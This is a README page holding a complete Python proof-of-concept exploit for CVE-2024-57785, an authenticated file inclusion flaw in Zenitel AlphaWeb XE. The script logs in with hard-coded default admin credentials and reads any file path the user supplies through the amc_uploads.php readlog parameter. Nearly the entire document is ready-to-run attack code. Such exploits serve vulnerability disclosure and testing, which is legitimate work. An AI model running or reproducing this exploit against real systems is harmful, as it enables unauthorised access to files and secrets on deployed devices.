README.md
Rendering markdown...
import requests
import argparse
import base64
#Default Credentials
admin_user = "admin"
admin_pw = "alphaadmin"
art = """
[*] Exploit Title: Authenticated File Inclusion Vulnerability on Zenitel AlphaWeb XE Version 11.2.3.10
[*] Date: 08/02/2025
[*] Exploit Author: Safvan Parakkal
[*] Vendor Website: https://www.zenitel.com/
[*] CVE: CVE-2024-57785
"""
print(art)
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', required=True, action='store', help="Target URL")
parser.add_argument('-f', '--file', required=True, action='store', help='The file to read')
my_args = parser.parse_args()
return my_args
def main():
args = get_args()
base_url = args.url
file_to_read = args.file
lfi_url = base_url + "/php/amc_uploads.php?action=readlog&file=" + args.file
authorization = "Basic" + " " + str(base64.b64encode((admin_user+':'+admin_pw).encode('ascii')).decode('ascii'))
login_headers = {
"Authorization": authorization,
"User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.5.59 (like Safari/604.1)",
"Accept": 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Cookie": "PHPSESSID=74db36a51834159c981252197d29a8fb",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": 'gzip, deflate, br',
"Connection": "keep-alive",
}
try:
response = requests.get(lfi_url, headers=login_headers)
print(response.text)
if response.status_code == 200:
print(f"[*] Reading the file '{file_to_read}'")
print("======================================")
print(response.text)
print("======================================")
return
else:
print("[-] Payload failed or file content not found.")
except requests.RequestException as e:
print(f"[!] Request failed: {e}")
return
if __name__ == "__main__":
main()